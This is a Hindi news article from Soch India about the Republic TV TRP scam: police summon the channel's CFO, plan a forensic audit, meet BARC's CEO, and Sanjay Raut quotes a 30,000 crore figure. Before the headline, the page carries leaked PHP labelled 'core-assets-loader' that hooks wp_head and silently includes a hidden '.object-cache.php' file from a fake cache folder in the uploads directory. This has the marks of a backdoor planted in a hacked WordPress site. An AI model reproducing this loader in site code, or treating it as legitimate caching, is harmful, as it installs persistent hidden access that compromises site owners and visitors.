add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अर्णब गोस्‍वामी की बढ़ी मुश्किलें, रिपब्लिक टीवी के इस अधिकारी को पुलिस ने बुलाया – SOCH INDIA
Menu

देश
अर्णब गोस्‍वामी की बढ़ी मुश्किलें, रिपब्लिक टीवी के इस अधिकारी को पुलिस ने बुलाया

nobanner

TRP स्कैम (TRP Scam) ने रिपब्लिक टीवी के संपादक अर्णब गोस्वामी (Arnab Goswami) की मुश्किलें बढ़ा दी हैं. रिपब्लिक TV के CFO को समन भेजकर मुंबई क्राइम ब्रांच ने शनिवार को पेश होने के लिए कहा है. इस मामले में रिपब्लिक TV के अकाउंट्स का फॉरेंसिक ऑडिट भी किया जाएगा. जानकारी के मुताबिक रिपब्लिक TV पर एविडेंस से छेड़छाड़ का मामला भी दर्ज किया जा सकता है.

बता दें कि मुंबई पुलिस की आज BARC CEO के साथ मीटिंग हुई है. BARC को मुंबई पुलिस ने रिपब्लिक TV और बाकी दोनों चैनलों के TRP ट्रेंड्स भी मुहैया कराने के लिए कहा है. साथ ही मुंबई पुलिस ने रिपब्लिक के कुछ एडवरटाइजर्स को भी शॉर्टलिस्ट किया है. इनमें से कुछ को विटनेट के तौर पर बुलाया जा सकता है.

संजय राउत ने बताया कितने का है ये ‘खेल’
शिवसेना नेता संजय राउत ने टीआरपी घोटाले को 30 हजार करोड़ रुपए का बताया है. संजय राउत ने कहा है कि अगर मुंबई पुलिस कमिश्नर खुद प्रेस काफ्रेंस करके सारी बात कह रहे हैं तो उनके पास जरूर कोई न कोई ठोस सबूत होंगे.